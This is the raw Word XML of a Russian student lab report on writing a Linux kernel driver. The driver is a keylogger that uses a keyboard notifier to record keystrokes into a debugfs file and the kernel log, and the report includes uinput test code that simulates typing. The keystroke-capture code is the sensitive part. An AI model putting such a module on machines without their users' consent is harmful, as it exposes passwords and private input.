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29AF2719" w:rsidR="00F427FA" w:rsidRPr="005758A8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D321BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4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5DB2ADED" w:rsidR="00F427FA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>на тему: «</w:t>
      </w:r>
      <w:r w:rsidR="00D321BF" w:rsidRPr="00D321BF">
        <w:t>Разработка драйвера для ОС Linux (Ubuntu)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056DA259" w:rsidR="00D175E6" w:rsidRPr="00D175E6" w:rsidRDefault="00D175E6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>Дмитриев Андрей Александр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>доц. Островский Алексей Мичеславович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>асс. Четвертухин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 w:rsidP="000E654D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0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1136BD5B" w:rsidR="00F427FA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Цель работы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C370B4">
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidR="00C370B4" w:rsidRPr="00C370B4">
        <w:t>зучить основы разработки драйверов для ядра Linux с</w:t>
      </w:r>
      <w:r w:rsidR="00E36256">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C370B4" w:rsidRPr="00C370B4">
        <w:t>использованием языка программирования C, включая настройку окружения,</w:t>
      </w:r>
      <w:r w:rsidR="00E36256">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C370B4" w:rsidRPr="00C370B4">
        <w:t xml:space="preserve">создание драйвера и его тестирование. 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2095A63B" w14:textId="77777777" w:rsidR="009E515C" w:rsidRDefault="009E515C" w:rsidP="009E515C">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009E515C">
        <w:t>2. Разработать драйвер, логирующий символы со стандартного потока ввода (клавиатуры). Использовать register_keyboard_notifier, чтобы получать уведомления о событиях клавиатуры. При выгрузке драйвера вызвать unregister_keyboard_notifier, чтобы отключить обработчик.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112FE170" w14:textId="77777777" w:rsidR="009E515C" w:rsidRDefault="009E515C" w:rsidP="009E515C">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576865B2" w14:textId="27270FCB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Ход выполнения работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1248CF" w14:textId="52ED4376" w:rsidR="00F427FA" w:rsidRPr="00DA2E83" w:rsidRDefault="009E515C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA2E83">
        <w:t>Код драйвера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C52C23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init.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF074F2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kernel.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC322A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module.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65157074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moduleparam.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028801D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keyboard.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BC281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debugfs.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5AEC0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input.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1D81B7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90613BB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BUF_LEN (PAGE_SIZE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&lt;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792FED5C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CHUNK_LEN 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EB1C92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7E91D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#define DEVICE_NAME "my_keylogger_device_2"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ADD98C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7F8DAC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DULE_LICENSE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PL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6AFA1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DULE_AUTHO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mitriev A.A.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083E5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DULE_VERSIO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.0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14B384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DULE_DESCRIPTIO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logger driver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BA3AD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6FC4B7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entry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ile;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DA50F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entry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ubdir;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7060B4D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06CD9C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river_name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y_keylogger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50ABF5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5BA5D4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static int major_number;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF59074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B3953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size_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s_rea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p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D6F7DF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3FA47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9969872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ff_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ffse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630E14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1FE5B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logger_cb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otifier_block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bloc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2BD60A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e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63183B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param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497D5C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F1379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s_keymap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EF79B2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ESC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ESC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!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2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@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// 0-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551C7E9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3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#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4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5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%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6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^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// 4-7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4130B03C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7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&amp;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8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*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(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// 8-11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E5B7A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=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+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BACKSPACE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BACKSPACE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// 12-14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC4456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TAB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TAB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q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Q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</w:p>
    <w:p w14:paraId="6AA88824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y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Y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// 20-23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7BBE9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[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{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]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}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// 24-27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4BAE2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CTR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CTR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// 28-31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E65CFD7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// 32-35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E3164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j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J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;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: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// 36-39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD9FA2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'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`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~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SHIF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SHIF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\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|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40-43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215EA71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z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Z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// 44-47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473C55E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&lt;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// 48-51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B7414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&gt;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?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SHIF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SHIF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RTSCR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*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</w:p>
    <w:p w14:paraId="414FFE8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AL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AL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CAPS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CAPS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1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1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</w:p>
    <w:p w14:paraId="34E49B0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2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2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3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3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4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4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5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5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// 60-63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411BF312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6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6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7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7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8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8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9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9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// 64-67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6848D4B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1my0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10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NUM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NUM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SCROL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SCROL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// 68-70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D15BF9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7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HOME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8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UP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9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GUP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71-73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5663931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4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EF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5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5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// 74-76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450DC82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6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IGH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+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+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1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END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// 77-79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC40C8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2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DOWN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3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GDN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0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INS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80-82</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4821961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D.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DE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SYSRQ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SYSRQ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// 83-85</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B88FF8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11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11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12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12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// 86-89</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BE9BF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</w:p>
    <w:p w14:paraId="6872B4C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ENTER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KPENTER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CTR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CTR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</w:p>
    <w:p w14:paraId="138E839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RTSCR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RTSCR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AL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AL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// 99-101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5B52BB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HOME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HOME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UP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UP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GUP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GUP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// 102-104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381BB1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EF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LEF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IGH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RIGHT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END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END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</w:p>
    <w:p w14:paraId="72F2E4B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DOWN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DOWN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GDN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GDN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INS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INS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// 108-110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3D941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DE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DEL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// 111-114</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34669B4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// 115-118</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F60E9A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AUSE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PAUSE_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                             // 119</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F0C892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74B4A2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688E1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uf_pos;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1FCC9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s_bu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BUF_LEN];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF98F1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2F2EF9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_operations keys_fops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CDF7C2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.owner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HIS_MODULE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ABCD4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.read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s_read,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEDD03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75A92A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B89FA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read function for file_operations structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD1B01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size_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s_rea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p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05D6E2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586594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93D9F3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     </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2E8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ff_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ffse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117E3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6239BD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mple_read_from_buffe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buffer, len, offset, keys_buf, buf_pos);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D24E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C1D571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A29E1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otifier_block keylogger_blk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596B91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.notifier_call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logger_cb,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524647D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D3F09A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63146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convert keycode to readable string and save in buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4211A1A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code_to_string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code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hift_mas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74854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628B77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keycode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RESERVED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code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PAUSE) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2312906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us_key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A3A2F7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(shift_mask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_keymap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keycode][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_keymap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keycode][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53B8142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DA8E1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printk(KERN_INFO "%s: keycode_to_string us_key=%s\n", driver_name, us_key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59896B9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F1169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nprint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buf, CHUNK_LEN,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us_key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FB473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0E7C59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694566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C35C6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keypress callback, called when a keypress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BC8AA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logger_cb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otifier_block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bloc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1EE03C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e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8D3BE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param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40128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D1326A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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BD855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bu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CHUNK_LEN]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BB143C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board_notifier_param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param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_param;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A831094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1FC6F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printk(KERN_INFO "%s: keylogger_cb code=0x%lx, down=0x%x, shift=0x%x, value=0x%x\n",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2103B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  driver_name, code, param-&gt;down, param-&gt;shift, param-&gt;value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9770D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D0FC9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trace only when a key is pressed down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1477ED54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w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7D85E4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OTIFY_OK;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A5641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FDBD3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keycode to readable string in keybuf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4FDDC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code_to_string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hif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keybuf);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FC51D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len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le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keybuf);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDBAB0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1C3DC96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ignore unmapped keycode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963FFF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len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      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5F32CB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OTIFY_OK;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2C78F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28EF0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reset key string buffer position if exhausted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31659BFB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buf_pos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)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UF_LEN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221DC2E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buf_pos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C9EB4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54162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copy readable key to key string buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E3A147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ncpy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ys_buf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uf_pos, keybuf, len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AEEDF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buf_pos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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEC206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A3088C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RN_INFO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keybuf=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driver_name, keybuf);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058BBE8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17ED9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OTIFY_OK;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A02C9C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80447F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4992B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__init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logger_ini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8D607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6BAE96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RN_INFO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Start init Keyboard Logger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driver_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9A1B3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14042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major_number = register_chrdev(0, DEVICE_NAME, NULL);  //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гистрация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стройства</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EFEB9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if (major_number &lt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732CD14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    printk(KERN_ALERT "Failed to register device\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19653BBB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    return major_number;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB12B8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E0D06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printk(KERN_INFO "Device registered with major number: %d\n", major_number);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A72BB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45362B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subdir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bugfs_create_di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log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3BE0E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_ER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subdir))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B30744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R_ER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subdir);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE9D0FC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ubdir)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610343C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ENT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554C7A1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5B3A7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RN_INFO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Dir maked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driver_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F9F6F0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835D5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bugfs_create_file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s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400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subdir,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keys_fops);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA0615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ile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C424AB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bugfs_remove_recursive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subdir);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BFA5E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OENT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784DBEB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99ADDE7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3FDC5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RN_INFO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File maked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driver_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF4748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2856F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ister_keyboard_notifie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keylogger_blk);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149CDA03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06452D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RN_INFO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Keyboard notifier registered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driver_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CC0E2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48B408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2F6F0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CC3040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7E926D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__exit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logger_exit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C4528A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09F440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RN_INFO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Start exit Keyboard Logger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driver_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5901E72F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0ECEB7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unregister_chrdev(major_number, DEVICE_NAME);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D17C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nregister_keyboard_notifier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A2E8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keylogger_blk);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F24EF59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FF17EE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RN_INFO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Keyboard notifier unregistered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driver_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2345BCD6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A1A22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bugfs_remove_recursive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subdir);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127973A1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855A2D5" w14:textId="77777777" w:rsidR="00DA2E83" w:rsidRPr="00DA2E83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A2E8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k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KERN_INFO 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Files remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2E8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DA2E8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A2E8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driver_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685499D2" w14:textId="77777777" w:rsidR="00DA2E83" w:rsidRPr="00E1010F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10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09E0255" w14:textId="77777777" w:rsidR="00DA2E83" w:rsidRPr="00E1010F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CC1FB8" w14:textId="77777777" w:rsidR="00DA2E83" w:rsidRPr="00E1010F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101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dule_init</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10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keylogger_init);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E98918" w14:textId="77777777" w:rsidR="00DA2E83" w:rsidRPr="00E1010F" w:rsidRDefault="00DA2E83" w:rsidP="00DA2E83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101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dule_exit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10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keylogger_exit);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEDAA96" w14:textId="054C983D" w:rsidR="00DA2E83" w:rsidRPr="00E1010F" w:rsidRDefault="00DA2E83">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA63DC2" w14:textId="0A210E5D" w:rsidR="009E515C" w:rsidRDefault="00DA2E83" w:rsidP="006228AE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Помимо вывода </w:t>
      </w:r>
      <w:r w:rsidR="00476623">
        <w:t xml:space="preserve">нажатой клавиши в </w:t>
      </w:r>
      <w:r w:rsidR="00CB600B">
        <w:t xml:space="preserve">поток </w:t>
      </w:r>
      <w:r w:rsidR="00CB600B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>KERN</w:t>
      </w:r>
      <w:r w:rsidR="00CB600B" w:rsidRPr="00CB600B">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00CB600B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INFO</w:t>
      </w:r>
      <w:r w:rsidR="00CB600B" w:rsidRPr="00CB600B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB600B">
        <w:t>клавиша добавляется в файл установленного размера.</w:t>
      </w:r>
      <w:r w:rsidR="001E3608">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A37ED" w14:textId="77777777" w:rsidR="00E17222" w:rsidRDefault="00E17222" w:rsidP="006228AE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5216CA" w14:textId="5E56233D" w:rsidR="00E17222" w:rsidRDefault="00E17222" w:rsidP="006228AE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Привер вывода:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669EFE1B" w14:textId="41ED658A" w:rsidR="002379C6" w:rsidRPr="002379C6" w:rsidRDefault="00006E35" w:rsidP="006228AE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00006E35">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B5D482F" wp14:editId="73D59D87">
            <wp:extent cx="5940425" cy="917575"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="82285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597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1EB3" w14:textId="77777777" w:rsidR="009E515C" w:rsidRDefault="009E515C" w:rsidP="006228AE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB5480E" w14:textId="1379DDB9" w:rsidR="00C000C6" w:rsidRDefault="00424F27" w:rsidP="006228AE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для реализации тестов сначала был использован </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xdotool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>keyboard</w:t>
      </w:r>
      <w:r w:rsidRPr="00424F27">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>notifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00424F27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">работает на более низком уровне, поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xdotool</w:t>
      </w:r>
      <w:r w:rsidRPr="00424F27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>не подходит для такой задачи</w:t>
      </w:r>
      <w:r w:rsidR="00502D22">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C000C6">
        <w:t xml:space="preserve"> Выбор был сделан в пользу</w:t>
      </w:r>
      <w:r w:rsidR="00C000C6" w:rsidRPr="00C000C6">
        <w:t xml:space="preserve"> uinput</w:t>
      </w:r>
      <w:r w:rsidR="00C000C6">
        <w:t xml:space="preserve">, он имитирует нажатия на низком уровне, эмулируя нажатия </w:t>
      </w:r>
      <w:r w:rsidR="00F81816">
        <w:t xml:space="preserve">на </w:t>
      </w:r>
      <w:r w:rsidR="00C000C6">
        <w:t>виртуальной клавиатур</w:t>
      </w:r>
      <w:r w:rsidR="00C006C3">
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="00F81816">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CE2725" w14:textId="77777777" w:rsidR="00B75016" w:rsidRDefault="00B75016" w:rsidP="006228AE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47665799" w14:textId="337C5445" w:rsidR="00B75016" w:rsidRPr="00E1010F" w:rsidRDefault="00B75016" w:rsidP="006228AE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Код</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1010F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>тестов</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1010F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969CA1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input.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7BDC4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linux/uinput.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBF7C7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fcntl.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4916E32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0E154E06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625F038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ring.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72168F6E" w14:textId="77777777" w:rsidR="00B75016" w:rsidRPr="00E1010F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1010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E101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1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66895CCE" w14:textId="77777777" w:rsidR="00B75016" w:rsidRPr="00E1010F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BA2FC4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отправки события нажатия клавиши</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C73F6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nd_key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cod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ess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1D7498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input_event event;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2C78F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42A5D8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ка события нажатия/отпускания клавиши</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5853BA5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mse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event,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event));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1FBC4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V_KEY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8787A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code;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6BD58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ress;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1 -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жатие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, 0 -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ускание</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEC71C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d,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event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event));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D63DF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1499BA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ка события синхронизации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5A62B6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emse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amp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event,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izeo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event));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6289E0E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V_SYN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E867A8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YN_REPORT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6816664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5D98B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d,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event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event));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B87AC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B4BC78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32D465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я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вода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имвола</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0B09D3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ype_cha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484A30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printf("%c", c);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6FAA1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char i = 'i';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DD5766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printf("%d %d\n", i, KEY_I);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6EC77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E7BB5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C09A8A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98F30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поставление символа с кодом клавиши</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB028E4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c) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D620A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A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46B76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B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F5E25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C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F95DF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D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95B6A6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E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8CDECF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F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4CA99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G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136345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H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D41E3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I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98F1A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j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J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A7ACE2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K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42E471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L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4280B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M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350D92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N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A6890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O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2E29FD1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P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19CE1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Q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045F43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R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C76096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S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D12CC4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T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CAF1F9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U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5C9DA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v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V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D1904C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W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3D942D3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X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E56E25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Y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CBF64F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Z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907A25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COMMA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AABC4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DOT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06AE2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keycode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SPACE;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A545314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Игнорируем неизвестные символы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100424AC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09FF9E73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E6E4B9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ка нажатия и отпускания клавиши</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5856A0F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nd_key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fd, keycode,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Нажатие</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6A1E04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nd_key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d, keycode,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ускание</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180E43B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7648892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C2E74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ввода строки с задержкой</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2E57B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ype_string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lay_ms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BE8F78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i]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75016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 i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36CD846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printf("%c", str[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B1D45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ype_cha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d,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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2CD2F1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leep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delay_ms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Задержка в миллисекундах</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A55B9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AB87DD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BF5DF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85B36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0E40B0B1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d;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C73F5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uinput_user_dev uidev;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D663B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BC65A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крываем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стройство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uinput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5593BEE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d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/dev/uinput"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O_WRONLY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_NONBLOCK);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200EC57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fd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1B90B4A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nable to open /dev/uinput"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F2F92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4D8DA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040583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8555A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страиваем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стройство</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1933C46F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mse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uidev,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uidev));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720384DA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ncpy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idev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rtual Keyboard"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UINPUT_MAX_NAME_SIZE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0C97AF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idev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styp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US_USB;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A23CB0C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idev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ndo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x1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31673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idev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x1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51C3B5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uidev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d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750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ersion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FCDD3F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49831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станавливаем поддерживаемые события</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D36294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octl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d, UI_SET_EVBIT, EV_KEY);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DB27B2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A; key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KEY_Z; key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F8E9E66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octl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d, UI_SET_KEYBIT, key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F7484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205AE0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octl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d, UI_SET_KEYBIT, KEY_SPACE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF2976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octl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d, UI_SET_KEYBIT, KEY_COMMA);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA798EC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octl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d, UI_SET_KEYBIT, KEY_DOT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A2604A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54C676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стройство</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E4C9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d,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uidev,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uidev))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CDD581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ailed to create uinput device"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89EB7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d);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5019E32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2D3E1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EB3E52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AD91F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octl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d, UI_DEV_CREATE)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C182679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ailed to create uinput device"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588A9E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fd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E9DFE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53E64A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5A71635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0BBF0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leep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00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AD40B8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98BB5E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вод текста с задержкой 2 секунды между символами</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E58EDE7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text </w:t>
      </w:r>
